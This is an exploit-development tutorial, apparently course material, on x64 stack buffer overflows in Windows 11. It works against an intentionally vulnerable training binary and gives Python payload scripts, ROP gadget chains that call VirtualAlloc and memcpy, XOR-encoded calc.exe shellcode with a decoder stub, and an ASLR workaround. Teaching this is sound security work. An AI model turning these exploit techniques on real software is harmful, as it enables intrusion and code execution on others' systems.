BOF
g3tsyst3m // course material

Buffer Overflows
in the Modern Era

A ground-up guide to x64 stack-based buffer overflows on Windows 11 24H2 — from debugger fundamentals through ROP chain construction, shellcode encoding, DEP/ASLR bypass, and a fully working exploit against a real vulnerable binary.

Windows 11 24H2 x64 Architecture ROP Chains Python Exploit Dev DEP + ASLR Bypass
Part 1 Debugger & Setup
Part 2 First Overflow
Part 3 ROP Chains + VirtualAlloc
Part 4 Shellcode + memcpy
Part 5 ASLR Bypass
01
Part One

Environment Setup & x64dbg Fundamentals

// Disabling protections, compiling the target, and manually controlling RIP

Learning Objectives

  • Disable Windows 11 Core Isolation and Exploit Protection for controlled learning
  • Compile the vulnerable binary with stack protections disabled using MinGW-w64
  • Navigate x64dbg — set breakpoints, step through instructions, inspect registers and stack
  • Manually redirect RIP to an unreachable function using the debugger
  • Understand why x64 buffer overflows use ROP rather than JMP RSP

The Challenge — x64 on Windows 11

Stack-based buffer overflows on x64 Windows 11 are a fundamentally different problem from the x86 exploits that filled offensive security courses for the past two decades. DEP is always-on at the hardware level. ASLR randomizes module base addresses every boot. Stack canaries are the default in modern compilers. The techniques that worked in 2010 crash immediately on a fully patched Windows 11 24H2 machine.

This series was born from a personal challenge: successfully exploit a buffer overflow on the latest fully-patched Windows 11, bypassing all modern mitigations. The answer is Return Oriented Programming (ROP) — reusing the program's existing instructions rather than injecting new code. This module sets up the environment and teaches the debugger before we touch any exploit code.

Step 1 — Disable Windows Protections for Learning

Before building the exploit we need a controlled environment. Parts 1–4 deliberately disable Windows security features so we can learn the core mechanics without fighting multiple protections at once. Part 5 re-enables everything and demonstrates ASLR bypass. This is the correct pedagogical order — learn the technique cleanly first, then add complexity.

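Two locations to toggle off in Windows Security: Core Isolation (Device security → Core isolation details) and Exploit Protection (App & browser control → Exploit protection settings).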

Step 2 — The Vulnerable Binary

The target binary is purpose-built for this series. It includes several intentional design choices that make it exploitable and also provide the primitives we'll need for the full exploit chain:

C++ overflow.cpp — the vulnerable target binary
    // overflow.cpp - g3tsyst3m
    // Intentionally vulnerable binary for the buffer overflow series
    // Compile: x86_64-w64-mingw32-g++ -o overflow.exe overflow.cpp -fno-stack-protector -no-pie -static
    #include <windows.h>
    #include <iostream>
    #include <cstring>
    #include <cstdio>   // printf
    #include <cstdlib>  // system

    // win_function() is intentionally never called by main()
    // Goal: demonstrate controlling RIP by redirecting execution here
    void win_function() {
        std::cout << "You have successfully exploited the program!\n";
        system("calc.exe");
    }

    void vulnerable_function() {
        char buffer[275];    // 275-byte buffer, no bounds checking
        std::cout << "Enter some input: ";
        std::cin >> buffer;  // UNSAFE: stops at whitespace, no length limit
    }

    int main() {
        // VirtualAlloc intentionally imported and called here so it appears
        // in the binary's import table. We'll resolve its address via x64dbg
        // and use it as a ROP chain target in later parts
        LPVOID mem = VirtualAlloc(NULL, 1024, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        if (mem) printf("Memory allocated at %p\n", mem);
        std::cout << "Welcome to the vulnerable program!\n";
        vulnerable_function();
        std::cout << "Goodbye!\n";
        return 0;
    }

Compile Flags — What Each Does and Why It Matters

Shell Compile command with explanation
    x86_64-w64-mingw32-g++ -o overflow.exe overflow.cpp -fno-stack-protector -no-pie -static

    # -fno-stack-protector
    #   Disables stack canaries. Without this, GCC inserts a random value
    #   between the buffer and the saved return address. If the canary is
    #   overwritten, the program terminates before RIP can be hijacked.
    #   With this flag: we can overwrite the return address freely.

    # -no-pie
    #   Disables Position Independent Executable, the compiler's side of ASLR.
    #   A PIE binary loads at a random base address, making static
    #   addresses in ROP chains invalid. With -no-pie: binary loads at a fixed
    #   base (0x140000000), so our gadget addresses are stable across runs.
    #   NOTE: We re-enable ASLR in Part 5 and solve it programmatically.

    # -static
    #   Links the C/C++ runtime statically into the binary, so memcpy lives
    #   inside overflow.exe at a stable address. VirtualAlloc itself stays in
    #   kernel32.dll, but its import table entry sits at a fixed address inside
    #   the binary, so neither API depends on DLL load order.

02
Part Two

The First Real Buffer Overflow — Controlling RIP with Python

// 296 bytes of junk, one struct.pack, and a calculator

Learning Objectives

  • Determine the exact byte offset needed to reach the return address (296 bytes)
  • Use Python's subprocess and struct modules to craft and deliver a buffer overflow payload
  • Attach x64dbg to a running process and verify stack control
  • Observe how the overflow reaches the return address without placing it directly in RIP

Finding the Offset — 296 Bytes

The buffer is declared as char buffer[275] but the overflow needs 296 bytes to reach the saved return address on the stack. The extra 21 bytes account for the function's stack frame overhead — saved registers, alignment padding, and the gap between the buffer start and the saved RIP location. Finding this value typically involves sending increasing amounts of data until the stack shows control at the return address position, or using a cyclic pattern tool like pwndbg's cyclic function.

Having written the vulnerable program ourselves gives the shortcut of knowing the buffer is 275 bytes — adding 20–30 bytes to find the exact offset is quick empirical work.
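The pattern-based approach mentioned above can be sketched in a few lines of Python. This is a minimal illustration, not the series' own tooling: make_pattern and pattern_offset are hypothetical helper names, and the Aa0Aa1Aa2 layout is just one common way to build a non-repeating pattern. The idea is to send the pattern instead of the junk bytes, read the 8 bytes sitting at the saved return address in x64dbg, and look up where they occur in the pattern.

```python
import string

def make_pattern(length):
    """Build a non-repeating pattern of upper/lower/digit triples: Aa0Aa1Aa2..."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length].encode()
    raise ValueError("pattern too long for this simple generator")

def pattern_offset(pattern, chunk):
    """Return the offset at which chunk first appears in pattern, or -1."""
    return pattern.find(chunk)

pattern = make_pattern(400)

# Stand-in for the 8 bytes a debugger would show at the saved return address.
observed = pattern[296:304]
print(pattern_offset(pattern, observed))
```

The pattern contains only letters and digits, so it passes through std::cin >> buffer without being cut short.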

Python overflow_part2.py — first working buffer overflow redirecting to win_function()
    # overflow_part2.py - g3tsyst3m Part 2
    # Sends 296 bytes of junk followed by the address of win_function()
    # win_function() is at 0x14000158C (confirmed in x64dbg symbols view)
    import struct
    import subprocess

    # 296 bytes fills the buffer AND overwrites up to the saved return address
    junk = 296
    payload = b"\x41" * junk

    # Append the address of win_function() in little-endian 64-bit format
    # struct.pack("<Q", addr) = 8 bytes, little-endian unsigned 64-bit
    # 0x14000158C is the address INSIDE win_function after stack alignment setup
    # (not the very first instruction: skip past the stack alignment prologue)
    payload += struct.pack("<Q", 0x14000158C)

    process = subprocess.Popen(
        ["C:/path/to/overflow.exe"],  # update to your path
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE
    )

    # Pause to allow attaching x64dbg before sending payload
    input("Attach overflow.exe to x64dbg, then press Enter...")

    stdout, stderr = process.communicate(input=payload)
    print(stdout.decode())
    if stderr:
        print(stderr.decode())

Why We Don't See the Address in RIP

A common point of confusion for developers coming from x86: after the overflow, the address of win_function() does not appear in the RIP register right away. Instead, the debugger shows the 0x41 fill from the junk bytes in the stack memory around RSP, and possibly in registers restored from the overwritten frame. The overwritten return address sits on the stack, waiting to be popped into RIP when the next RET instruction executes.

This is the fundamental shift from x86 thinking to x64 ROP thinking: stop watching RIP, watch the stack. RIP is just executing whatever the current RET pops. The attack surface is the stack contents, not RIP's current value.
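To make "watch the stack" concrete, here is a small sketch of what the Part 2 payload looks like as raw bytes. The offset and address come from the text above; the constant names are only illustrative.

```python
import struct

OFFSET_TO_RET = 296         # bytes of junk before the saved return address
WIN_FUNCTION = 0x14000158C  # address used in overflow_part2.py

packed = struct.pack("<Q", WIN_FUNCTION)
payload = b"\x41" * OFFSET_TO_RET + packed

print(packed.hex(" "))                # the 8 bytes as they sit on the stack
print(len(payload))                   # total payload length
print(payload[OFFSET_TO_RET:].hex())  # what RET will pop into RIP
```

The low byte comes first in memory, so the stack view in x64dbg shows 8c 15 00 40 01 00 00 00 at the return address slot rather than the address in reading order.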


03
Part Three

ROP Chains — Building the VirtualAlloc Call

// Hunting gadgets, setting registers, defeating DEP without executing a single byte on the stack

Learning Objectives

  • Use Ropper and ROPgadget to enumerate available gadgets in the vulnerable binary
  • Construct a ROP chain to set RCX, RDX, R8, and R9 for a VirtualAlloc call
  • Understand why some registers (R8, R9) require creative multi-gadget chains
  • Find the address of a specific constant value in memory using x64dbg's memory search
  • Chain gadgets to execute VirtualAlloc and allocate RWX memory for shellcode

What Are ROP Gadgets?

ROP (Return Oriented Programming) gadgets are short instruction sequences already present in the binary's executable sections, each ending with a RET instruction. Because they already exist in executable memory, DEP doesn't prevent their execution. By chaining their addresses on the stack, we control what code executes simply by controlling where each RET goes.

The goal here is to call VirtualAlloc(NULL, 1024, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) entirely through ROP — no shellcode, no executable stack. We need to set four registers to specific values:

Python VirtualAlloc register requirements — what we need to build
    # VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect)
    # Windows x64 calling convention: RCX, RDX, R8, R9
    RCX = 0x00000000  # lpAddress = NULL (OS chooses the address)
    RDX = 0x000003E8  # dwSize = 1000 (bytes, enough for shellcode)
    R8  = 0x00003000  # flAllocationType = MEM_COMMIT | MEM_RESERVE
    R9  = 0x00000040  # flProtect = PAGE_EXECUTE_READWRITE
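The register values above follow directly from the Win32 constants. A short sketch that derives them, assuming only the documented values of MEM_COMMIT, MEM_RESERVE and PAGE_EXECUTE_READWRITE (the dictionary name is illustrative):

```python
# Documented Win32 constants
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40

# Windows x64 passes the first four integer arguments in RCX, RDX, R8, R9.
virtualalloc_args = {
    "rcx": 0,                             # lpAddress = NULL
    "rdx": 1000,                          # dwSize
    "r8": MEM_COMMIT | MEM_RESERVE,       # flAllocationType
    "r9": PAGE_EXECUTE_READWRITE,         # flProtect
}

for reg, value in virtualalloc_args.items():
    print(f"{reg.upper():>3} = 0x{value:08X}")
```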

Finding Gadgets — Ropper and ROPgadget

Shell Dump all gadgets to text files for manual review
    # Ropper: dumps all gadgets with their addresses
    ropper -f overflow.exe >> ropgadgets_ropper.txt

    # ROPgadget: alternative tool, useful for cross-validation
    py ROPgadget.py --binary overflow.exe >> ropgadgets_rop.txt

    # Both tools find largely the same gadgets, so use whichever you prefer
    # Search the output file for patterns like:
    #   grep "pop rax; ret" ropgadgets_ropper.txt
    #   grep "xor ecx, ecx" ropgadgets_ropper.txt
    #   grep "mov r8" ropgadgets_ropper.txt

Setting RCX = 0 (Easy)

The XOR ecx, ecx pattern — the canonical null-free zeroing technique — is the simplest register setup. Writing to ECX (32-bit) zero-extends into RCX (64-bit), so a single gadget is enough:

Python RCX gadget — xor ecx, ecx; mov rax, r9; ret
    # Found via: grep "xor ecx" ropgadgets_ropper.txt
    # The "mov rax, r9" side effect is acceptable: we don't care about RAX here
    payload += struct.pack("<Q", 0x14000276f)  # xor ecx, ecx; mov rax, r9; ret;
    # RCX = 0 ✓

Setting RDX = 0x1002 (Moderate)

No direct mov rdx, 1000 gadget exists. The creative solution: find a pop rax; ret gadget, load the memory address where the value 0x1000 is stored in the binary (found via memory search in x64dbg), dereference it into EAX, then add it to EDX, which an earlier gadget set to 2. The result is 0x1002, which is 4098 bytes in decimal (0x1000 is 4096, not 1000) and more than enough allocation size:

Python RDX gadget chain — creative multi-gadget value construction
    # Memory search trick: in x64dbg, Memory Map → search for value 0x1000
    # First result: address 0x1400000AC contains the DWORD value 0x1000
    # We'll pop this address into RAX, then dereference it to get 0x1000 (4096) into EAX
    payload += struct.pack("<Q", 0x140001f8c)  # pop rax; ret;  ← pops next value off stack into RAX
    payload += struct.pack("<Q", 0x140001f8c)  # (data) RAX now = 0x140001f8c, the address of pop rax; ret itself
    payload += struct.pack("<Q", 0x140001243)  # mov edx, 2; xor ecx, ecx; call rax;  ← EDX=2, ECX=0; the call pushes a return address, which pop rax then discards
    payload += struct.pack("<Q", 0x140001f8c)  # pop rax; ret;  ← pops next value into RAX
    payload += struct.pack("<Q", 0x1400000AC)  # VALUE: this is the ADDRESS where 0x1000 lives in memory
    payload += struct.pack("<Q", 0x140007678)  # mov eax, dword ptr [rax]; ret;  ← dereference: EAX = 0x1000
    payload += struct.pack("<Q", 0x140006995)  # add edx, eax; mov eax, edx; ret;  ← EDX = 2 + 0x1000 = 0x1002 ✓
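The control flow of this chain, in particular the call rax step, is easier to follow when simulated. The sketch below is a toy model, not a real emulator: it hardcodes the four gadgets from the listing, treats the chain as a queue of 64-bit stack slots, and assumes (as the text states) that 0x1400000AC holds the value 0x1000. The return address pushed by call rax is a placeholder value.

```python
from collections import deque

POP_RAX = 0x140001f8c             # pop rax; ret
MOV_EDX_2_CALL_RAX = 0x140001243  # mov edx, 2; xor ecx, ecx; call rax
LOAD_EAX = 0x140007678            # mov eax, dword ptr [rax]; ret
ADD_EDX_EAX = 0x140006995         # add edx, eax; mov eax, edx; ret
ADDR_OF_VALUE = 0x1400000AC       # per the text: holds the DWORD 0x1000
END = 0xDEADBEEF                  # sentinel marking the end of this toy chain

def run_chain(chain, memory):
    stack = deque(chain)           # leftmost element = top of stack
    regs = {"rax": 0, "rcx": 0xFFFF, "rdx": 0xFFFF}
    rip = stack.popleft()          # the function's RET pops the first entry
    while rip != END:
        if rip == POP_RAX:
            regs["rax"] = stack.popleft()
            rip = stack.popleft()              # ret
        elif rip == MOV_EDX_2_CALL_RAX:
            regs["rdx"] = 2
            regs["rcx"] = 0
            stack.appendleft(rip + 0xC)        # call pushes a return address (placeholder)
            rip = regs["rax"]
        elif rip == LOAD_EAX:
            regs["rax"] = memory[regs["rax"]] & 0xFFFFFFFF
            rip = stack.popleft()
        elif rip == ADD_EDX_EAX:
            regs["rdx"] = (regs["rdx"] + regs["rax"]) & 0xFFFFFFFF
            regs["rax"] = regs["rdx"]
            rip = stack.popleft()
        else:
            raise ValueError(f"unknown gadget {rip:#x}")
    return regs

chain = [POP_RAX, POP_RAX, MOV_EDX_2_CALL_RAX, POP_RAX,
         ADDR_OF_VALUE, LOAD_EAX, ADD_EDX_EAX, END]
regs = run_chain(chain, {ADDR_OF_VALUE: 0x1000})
print(hex(regs["rdx"]), regs["rdx"], regs["rcx"])
```

The second pop rax exists only to swallow the return address that call rax pushed, which keeps the rest of the chain aligned with the stack.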

Setting R8 = 0x3000 and R9 = 0x40 (Hard)

R8 and R9 are used sparingly in the binary's code, meaning few gadgets directly manipulate them. The solution involves routing values through RAX and RBX as intermediaries. R9 in particular is "hated": the only gadget that sets it also includes add rsp, 0x48, which advances the stack pointer by 72 bytes, so the chain needs filler bytes after the gadget address to compensate:

Python R9 gadget chain — the painful one (add rsp,48 requires NOP padding)
    # R9 = 0x40 (PAGE_EXECUTE_READWRITE)
    # Strategy: load 0x40 into RAX via memory dereference, move RAX→RBX,
    # then use the only available "mov r9, rbx" gadget, which unfortunately
    # also includes "add rsp, 0x48" that skips 72 bytes ahead on the stack.
    # Compensate by padding 72+32=104 bytes of filler (0x90) after the gadget address.
    payload += struct.pack("<Q", 0x140001f8c)  # pop rax; ret;
    payload += struct.pack("<Q", 0x140000018)  # address where 0x40 lives in the binary
    payload += struct.pack("<Q", 0x140007678)  # mov eax, dword ptr [rax]; ret;  ← RAX = 0x40
    payload += struct.pack("<Q", 0x140001b58)  # push rax; pop rbx; pop rsi; pop rdi; ret;  ← RBX = 0x40 (pops 2 extra values)
    payload += b"\x90" * 16                    # padding for the 2 extra pops (rsi, rdi)
    payload += struct.pack("<Q", 0x140007CA5)  # mov r9, rbx; [...]; add rsp,0x48; pop rbx/rsi/rdi/rbp; ret;
    #   ↑ this gadget moves RSP forward 0x48 (72) bytes
    #     and then pops rbx+rsi+rdi+rbp (32 more bytes)
    #     total: 104 bytes of stack we need to pad over
    payload += b"\x90" * 72                    # compensate for add rsp, 0x48
    payload += b"\x90" * 32                    # compensate for pop rbx/rsi/rdi/rbp
    # R9 = 0x40 ✓ (finally)
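The filler sizes in this chain are plain arithmetic: every extra pop consumes one 8-byte stack slot, and add rsp, N skips N bytes. A tiny helper makes that explicit (filler_after_gadget is a hypothetical name used only for this sketch):

```python
def filler_after_gadget(add_rsp=0, extra_pops=0, slot=8):
    """Bytes of filler a gadget consumes before its final ret reads the next address."""
    return add_rsp + extra_pops * slot

# push rax; pop rbx; pop rsi; pop rdi; ret  -> two pops beyond the one we wanted
print(filler_after_gadget(extra_pops=2))

# mov r9, rbx; ...; add rsp, 0x48; pop rbx; pop rsi; pop rdi; pop rbp; ret
print(filler_after_gadget(add_rsp=0x48, extra_pops=4))
```

The filler bytes are never executed, so their value does not matter as long as none of them is a bad character for the input routine.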

04
Part Four

Shellcode Encoding, memcpy Chain & Full Exploit

// XOR encoding + decoder stub + memcpy ROP = working shellcode execution

Learning Objectives

  • Understand why std::cin requires encoding — bad characters that break payload delivery
  • XOR-encode shellcode with key 0xAC and embed a self-decoding stub
  • Build a ROP chain to call memcpy and copy shellcode from stack to the VirtualAlloc'd region
  • Understand the NOP sled's role in the final payload layout
  • Assemble the complete exploit: shellcode + padding + ROP chain for VirtualAlloc + memcpy

The Bad Character Problem

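std::cin >> buffer stops reading at the first whitespace character: 0x20 (space) and 0x09 through 0x0D (tab, line feed, vertical tab, form feed, carriage return). Any shellcode byte or ROP gadget address containing one of these values truncates the payload. The series also treats the null byte (0x00) as a bad character for the shellcode, although operator>> itself does not stop on it, which is why gadget addresses with zero upper bytes still reach the stack intact. The solution is XOR encoding: transform every byte so none of the problematic values appear in the payload, then include a decoder stub that restores the original bytes at runtime before execution.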
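A quick way to check any piece of the payload for these bytes is a scanner like the following sketch. find_bad_bytes is a hypothetical helper, and the second address is made up purely to show a failing case.

```python
import struct

# Bytes that std::cin >> buffer treats as whitespace in the default locale
WHITESPACE = {0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x20}

def find_bad_bytes(data, bad=WHITESPACE):
    """Return (offset, byte) pairs for every bad byte found in data."""
    return [(i, b) for i, b in enumerate(data) if b in bad]

ok = struct.pack("<Q", 0x140001f8c)     # pop rax; ret gadget from Part 3
risky = struct.pack("<Q", 0x14000200A)  # hypothetical address containing 0x0A and 0x20

print(find_bad_bytes(ok))
print(find_bad_bytes(risky))
```

Running the same check over every packed gadget address before sending the payload catches truncation problems that are otherwise tedious to spot in the debugger.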

XOR Encoding with Key 0xAC

The key 0xAC was chosen because XOR-ing the shellcode bytes with it produces no bad characters. The encoded payload is safe to send through std::cin. At runtime, the decoder stub XORs each byte back with 0xAC to restore the original shellcode before jumping to it.
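XOR is its own inverse, which is what lets the same key both encode and decode. A minimal round-trip sketch with stand-in bytes (not real shellcode; xor_bytes is an illustrative helper name):

```python
def xor_bytes(data, key):
    """XOR every byte of data with a single-byte key."""
    return bytes(b ^ key for b in data)

KEY = 0xAC
# Stand-in bytes, including every value the series treats as a bad character
sample = bytes([0x00, 0x20, 0x09, 0x0A, 0x0D, 0x48, 0x83, 0xEC])

encoded = xor_bytes(sample, KEY)
decoded = xor_bytes(encoded, KEY)

print(encoded.hex())
print(decoded == sample)
```

Note the flip side: a raw byte equal to a bad character XOR the key (for example 0x8C, which is 0x20 XOR 0xAC) would encode into a bad character, so the key only works for shellcode that avoids those values.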

Python xor_encoder.py — encode shellcode with key 0xAC to remove bad characters
    # The raw calc.exe shellcode (207 bytes, no nulls, from the shellcoding module)
    # This is the IAT-walking WinExec shellcode targeting "calc.exe"
    shellcode  = b"\x48\x83\xec\x28\x48\x83\xe4\xf0\x48\x31\xc9\x65\x48\x8b\x41\x60\x48\x8b"
    shellcode += b"\x40\x18\x48\x8b\x70\x10\x48\x8b\x36\x48\x8b\x36\x48\x8b\x5e\x30\x49\x89"
    # ... (full 207-byte shellcode)

    xor_key = 0xAC  # chosen: avoids bad chars (0x00, 0x20, 0x09, 0x0A, 0x0D)
    encoded = bytearray()
    for byte in shellcode:
        encoded.append(byte ^ xor_key)

    # Verify: no bad chars in the encoded output
    # (0x0b and 0x0c are also whitespace for operator>>, so check them too)
    bad_chars = [0x00, 0x20, 0x09, 0x0a, 0x0b, 0x0c, 0x0d]
    for b in encoded:
        if b in bad_chars:
            print(f"BAD CHAR FOUND: 0x{b:02x}")

    print(f"Encoded: {encoded.hex()}")
    print(f"Length: {len(encoded)} bytes")

The Decoder Stub

The decoder stub is a small assembly routine prepended to the encoded shellcode. It XORs each byte back with the key at runtime, restoring the original shellcode in-place before jumping to it. This stub must itself be written in bytes that are safe to deliver — no bad characters in the stub encoding either.

x64 Assembly decoder_stub.asm — XOR decoder prepended to encoded shellcode
    ; decoder_stub - g3tsyst3m Part 4
    ; Prepended to the XOR-encoded shellcode. Decodes in-place at runtime.
    ; Bad-char free: no 0x00, 0x20, 0x09, 0x0A, 0x0D in the assembled bytes.
        xor rcx, rcx                        ; RCX = 0 (loop counter)
        lea rsi, [rip + FFFFFFFFFEBFDE09h]  ; null-free way to build shellcode base address
        add esi, 02222222h                  ; adjust RSI to point to encoded shellcode start
        mov rbx, rsi                        ; RBX = base (save for later jump)
        lea rsi, [rsi]                      ; RSI = pointer to current byte
        mov cl, 0CFh                        ; RCX = length of encoded shellcode (207 bytes)
        mov al, 0ACh                        ; AL = XOR key (0xAC)
    decode_loop:
        xor byte ptr [rsi], al              ; XOR one byte: decode it
        inc rsi                             ; advance pointer
        dec rcx                             ; decrement counter
        jne decode_loop                     ; repeat until all bytes decoded
    ; fall through to decoded shellcode (starts immediately after this stub)

memcpy ROP Chain — Copying Shellcode Off the Stack

After VirtualAlloc returns, the address of the new RWX region is in RAX. We then chain into memcpy to copy the encoded shellcode from the stack into that region. memcpy takes RCX (dst), RDX (src), and R8 (size): the destination is the address VirtualAlloc returned, the source is the stack address where our shellcode sits, and the size is 251 bytes (NOP sled + decoder stub + encoded shellcode).

Python Final payload layout — complete exploit structure
    # Complete payload structure for Part 4 (no ASLR)
    # All addresses use 0x140000000 base (fixed, ASLR disabled)

    # ─── SECTION 1: NOP sled + Decoder stub + Encoded shellcode ─────────────────
    # This goes at the START of the payload so it lands on the stack
    # The ROP chain will use memcpy to COPY this section to the VirtualAlloc'd region
    payload  = b"\x90" * 8        # NOP sled (8 bytes)
    payload += decoder_stub       # XOR decoder (36 bytes)
    payload += encoded_shellcode  # encoded calc shellcode (207 bytes)
    # total so far: 251 bytes of shellcode

    # ─── SECTION 2: Padding to reach return address ──────────────────────────────
    payload += b"\x41" * 45       # 45 bytes to reach offset 296 (251 + 45)

    # ─── SECTION 3: ROP chain ────────────────────────────────────────────────────
    # R9 gadgets (0x40 = PAGE_EXECUTE_READWRITE), set first because the chain is longest
    payload += struct.pack("<Q", 0x140001f8c)  # pop rax; ret;
    payload += struct.pack("<Q", 0x140000018)  # addr of 0x40
    payload += struct.pack("<Q", 0x140007678)  # mov eax,[rax]; ret;
    payload += struct.pack("<Q", 0x140001b58)  # push rax; pop rbx; pop rsi; pop rdi; ret;
    payload += b"\x90" * 16                    # compensate rsi/rdi pops
    payload += struct.pack("<Q", 0x140007CA5)  # mov r9,rbx; [add rsp,0x48]; pop rbx/rsi/rdi/rbp; ret;
    payload += b"\x90" * (72+32)               # compensate add rsp,0x48 + 4 extra pops

    # R8 gadgets (0x3000 = MEM_COMMIT|MEM_RESERVE)
    # ... (R8 chain — see Part 3)

    # RCX = 0 (lpAddress = NULL)
    payload += struct.pack("<Q", 0x14000276f)  # xor ecx, ecx; mov rax, r9; ret;

    # RDX = 0x1002 (dwSize)
    # ... (RDX chain — see Part 3)

    # Call VirtualAlloc!
    payload += struct.pack("<Q", 0x140001f8c)  # pop rax; ret;
    payload += struct.pack("<Q", 0x140007D78)  # VirtualAlloc import address
    payload += struct.pack("<Q", 0x140001fb3)  # jmp qword ptr [rax];  ← CALL VirtualAlloc ✓

    # ─── SECTION 4: memcpy ROP chain ──────────────────────────────────────────────
    # After VirtualAlloc: RAX = new RWX memory address
    # memcpy(dst=RAX, src=stack_ptr_to_shellcode, size=251)
    # RCX=dst, RDX=src, R8=size
    # ... (memcpy chain)

    # ─── SECTION 5: Jump to the copied shellcode ──────────────────────────────────
    # After memcpy: RAX = VirtualAlloc'd region (memcpy returns dst). It holds the
    # NOP sled, the decoder stub, and the still-encoded shellcode; the stub decodes
    # the shellcode in place once execution lands there.
    payload += struct.pack("<Q", 0x14000192f)  # jmp rax;  ← execute shellcode in RWX region ✓
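The section sizes have to add up to the 296-byte offset from Part 2, which is worth checking before debugging anything else. In the sketch below the 8, 207 and 296 values come from the text; the 36-byte stub size is an assumption obtained by counting the instruction encodings in the decoder listing, and it matches the 251-byte memcpy size stated above.

```python
NOP_SLED = 8
DECODER_STUB = 36        # assumption: hand-counted from the decoder listing
ENCODED_SHELLCODE = 207
OFFSET_TO_RET = 296      # from Part 2

section1 = NOP_SLED + DECODER_STUB + ENCODED_SHELLCODE
padding = OFFSET_TO_RET - section1

print(section1)  # size memcpy has to copy
print(padding)   # filler needed before the first ROP gadget address
```

If the stub or shellcode changes size, recomputing padding this way keeps the first gadget address exactly on the saved return address.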

05
Part Five

Defeating ASLR — Runtime Base Address Discovery

// Re-enable everything. Now bypass it.

Learning Objectives

  • Understand exactly what ASLR randomizes — and what it doesn't
  • Use Python's psutil and ctypes to programmatically retrieve the base address of a running process
  • Calculate dynamic ROP gadget addresses by adding fixed offsets to the runtime base
  • Re-enable all Windows 11 security features and run the full working exploit

Re-Enable All Protections — The Real Challenge Begins

For Part 5, re-enable everything that was disabled for Parts 1–4:

  • Core Isolation (all options including Memory Integrity)
  • Exploit Protection (DEP, ASLR, SEHOP, all system settings)
  • Secure Boot (verify in BIOS/UEFI settings)

With everything re-enabled, the Part 4 exploit fails immediately — the hardcoded 0x140001f8c addresses are now wrong because ASLR has randomized the binary's base address. The fix is straightforward: stop hardcoding addresses and discover them at runtime.

What ASLR Actually Randomizes

The key insight that makes ASLR bypassable here: ASLR randomizes the module's base address (the upper part of every address), but the offset within the module (the lower part) remains constant. A gadget at 0x140001f8c with ASLR disabled becomes, say, 0x00d8001f8c with ASLR enabled: only the base changed. The 0x1f8c offset is always the same relative to the module base.

This means all our ROP gadget addresses can be expressed as base_addr + offset. We just need to discover base_addr at runtime, and we can reconstruct every gadget address dynamically.
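The base_addr + offset idea can be sketched as a small helper that converts any Part 4 address into its runtime equivalent. rebase is a hypothetical name, and the runtime base used here is made up for illustration; in practice it comes from querying the running process.

```python
import struct

STATIC_BASE = 0x140000000  # fixed base used in Parts 1-4

def rebase(static_addr, runtime_base, static_base=STATIC_BASE):
    """Translate an address from the fixed-base binary to the randomized base."""
    return runtime_base + (static_addr - static_base)

runtime_base = 0x7FF6D8000000  # hypothetical value, different on every run

gadget = rebase(0x140001f8c, runtime_base)  # pop rax; ret
print(hex(gadget))
print(struct.pack("<Q", gadget).hex(" "))
```

Keeping the Part 4 addresses in the script and rebasing them at send time means the gadget list itself never has to be edited when the base changes.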

Python get_base_address.py — runtime module base discovery via EnumProcessModulesEx
    # get_base_address.py - g3tsyst3m Part 5
    # Discovers the runtime base address of overflow4.exe using Win32 API
    # Requires: pip install psutil
    import ctypes
    import psutil
    import subprocess

    def get_pid_by_name(process_name):
        for proc in psutil.process_iter(attrs=['pid', 'name']):
            if (proc.info['name'] or "").lower() == process_name.lower():
                return proc.info['pid']
        return None

    def get_base_address(pid):
        PROCESS_QUERY_INFORMATION = 0x0400
        PROCESS_VM_READ = 0x0010
        LIST_MODULES_ALL = 0x03
        h_process = ctypes.windll.kernel32.OpenProcess(
            PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, False, pid
        )
        if not h_process:
            return None
        try:
            h_modules = (ctypes.c_void_p * 1024)()
            needed = ctypes.c_ulong()
            if ctypes.windll.psapi.EnumProcessModulesEx(
                h_process, ctypes.byref(h_modules), ctypes.sizeof(h_modules),
                ctypes.byref(needed), LIST_MODULES_ALL
            ):
                return h_modules[0]  # first module = main executable
            return None
        finally:
            # Always release the process handle, on success or failure
            ctypes.windll.kernel32.CloseHandle(h_process)

    # Launch the vulnerable binary
    process = subprocess.Popen(["./overflow4.exe"], stdin=subprocess.PIPE,
                               stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    pid = get_pid_by_name("overflow4.exe")
    if pid:
        base_addr = get_base_address(pid)
        if base_addr:
            print(f"[+] Base address: {hex(base_addr)}")
            # Now use base_addr + static_offset for every ROP gadget:
            # payload += struct.pack("<Q", base_addr + 0x1f8c)  # pop rax; ret;
            # payload += struct.pack("<Q", base_addr + 0x276f)  # xor ecx, ecx; mov rax, r9; ret;
            # ... etc for all gadgets

Converting Static Addresses to Dynamic

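The only change to the Part 4 exploit is replacing every hardcoded 0x14000XXXX address with base_addr + 0xXXXX. The offsets never change regardless of ASLR, and because every offset used in this series is below 0x10000 while module bases are 64 KB-aligned, they show up unchanged as the last four hex digits of the runtime address. With base_addr discovered at runtime, every ROP gadget is recalculated correctly for the current run.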

Python Dynamic gadget addresses — before vs after ASLR bypass
    # BEFORE (Parts 1-4, ASLR disabled), hardcoded base 0x140000000:
    payload += struct.pack("<Q", 0x140001f8c)  # pop rax; ret;
    payload += struct.pack("<Q", 0x14000276f)  # xor ecx, ecx; mov rax, r9; ret;
    payload += struct.pack("<Q", 0x140007678)  # mov eax, dword ptr [rax]; ret;
    payload += struct.pack("<Q", 0x140007D78)  # VirtualAlloc import address

    # AFTER (Part 5, ASLR enabled), base_addr discovered at runtime:
    payload += struct.pack("<Q", base_addr+0x1f8c)  # pop rax; ret;  [same gadget, dynamic base]
    payload += struct.pack("<Q", base_addr+0x276f)  # xor ecx, ecx; mov rax, r9; ret;
    payload += struct.pack("<Q", base_addr+0x7678)  # mov eax, dword ptr [rax]; ret;
    payload += struct.pack("<Q", base_addr+0xD288)  # VirtualAlloc import address
    # NOTE: 0xD288 is the offset as listed for overflow4.exe; it differs from the
    # 0x7D78 shown above, so confirm the import address in x64dbg for your build.

